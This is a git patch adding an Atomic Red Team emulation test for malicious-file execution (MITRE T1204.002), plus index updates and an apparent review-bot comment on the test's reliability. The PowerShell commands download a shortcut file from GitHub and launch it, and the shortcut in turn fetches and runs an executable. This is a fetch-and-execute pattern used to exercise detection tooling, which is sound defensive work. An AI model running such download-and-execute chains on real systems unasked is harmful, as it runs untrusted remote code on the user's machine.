From a5ca285de1480fd19815761a48c8e08fd75b5eac Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Fri, 6 May 2022 04:43:44 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 19 +++++++++
 atomics/T1204.002/T1204.002.md | 41 +++++++++++++++++++
 6 files changed, 64 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 12af6a6d..baa3bf9d 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1024,6 +1024,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 0db5d339..9116f8e6 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -743,6 +743,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 90b52ac8..57adc896 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1673,6 +1673,7 @@
 - Atomic Test #7: Headless Chrome code execution via VBA [windows]
 - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
 - Atomic Test #9: Office Generic Payload Download [windows]
+ - Atomic Test #10: LNK Payload Download [windows]
 - T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index c93943b8..85a0719c 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1220,6 +1220,7 @@
 - Atomic Test #7: Headless Chrome code execution via VBA [windows]
 - Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
 - Atomic Test #9: Office Generic Payload Download [windows]
+ - Atomic Test #10: LNK Payload Download [windows]
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1106 Native API](../../T1106/T1106.md)
 - Atomic Test #1: Execution through API - CreateProcess [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b371f4cb..53f08b4c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -68868,6 +68868,25 @@ execution:
 -ErrorAction Ignore
 
 '
+ - name: LNK Payload Download
+ auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
+ description: This lnk files invokes powershell to download putty from the internet
+ and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+ $file1 = "$env:Temp\test10.lnk"
+ Start-Process $file1
+ Start-Sleep -s 10
+ taskkill /IM a.exe /F
+ cleanup_command: |-
+ $file1 = "$env:Temp\test10.lnk"
+ $file2 = "$env:Temp\a.exe"
+ Remove-Item $file1 -ErrorAction Ignore
+ Remove-Item $file2 -ErrorAction Ignore
+ name: powershell
 T1204.003:
 technique:
 object_marking_refs:
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index fabd09e2..969caa07 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -26,6 +26,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
 - [Atomic Test #9 - Office Generic Payload Download](#atomic-test-9---office-generic-payload-download)
+- [Atomic Test #10 - LNK Payload Download](#atomic-test-10---lnk-payload-download)
+
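Review bot: In the added `command:` block, `taskkill /IM a.exe /F` terminates every process on the host whose image name is a.exe, not only the one the shortcut launched, and the fixed `Start-Sleep -s 10` does not guarantee the download the LNK performs has finished before the kill and the cleanup `Remove-Item $file2` run, so on a slow link the test can report success while leaving a.exe running or a partial file behind. Scoping the kill to the dropped binary avoids the collateral, e.g. `Get-Process -Name a -ErrorAction SilentlyContinue | Where-Object { $_.Path -eq "$env:Temp\a.exe" } | Stop-Process -Force`, ideally inside a short poll loop instead of the fixed sleep. The shortcut itself is pulled from the mutable master ref of the repository with no integrity check, which for a test that deliberately executes whatever it downloads is worth tightening by pinning the commit in the raw URL or comparing `Get-FileHash` output against a known value before `Start-Process $file1`. The LNK's own download target is not visible in this hunk; the description says putty and `$env:Temp\a.exe` in `cleanup_command` implies the saved name, so stating the outbound URL in the description would tell detection engineers what egress to expect. These index files are generated, so the change belongs in atomics/T1204.002/T1204.002.yaml rather than here.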
@@ -584,4 +586,43 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
+
+
+
+## Atomic Test #10 - LNK Payload Download
+This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 581d7521-9c4b-420e-9695-2aec5241167f
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+$file1 = "$env:Temp\test10.lnk"
+Start-Process $file1
+Start-Sleep -s 10
+taskkill /IM a.exe /F
+```
+
+#### Cleanup Commands:
+```powershell
+$file1 = "$env:Temp\test10.lnk"
+$file2 = "$env:Temp\a.exe"
+Remove-Item $file1 -ErrorAction Ignore
+Remove-Item $file2 -ErrorAction Ignore
+```
+
+
+
+
+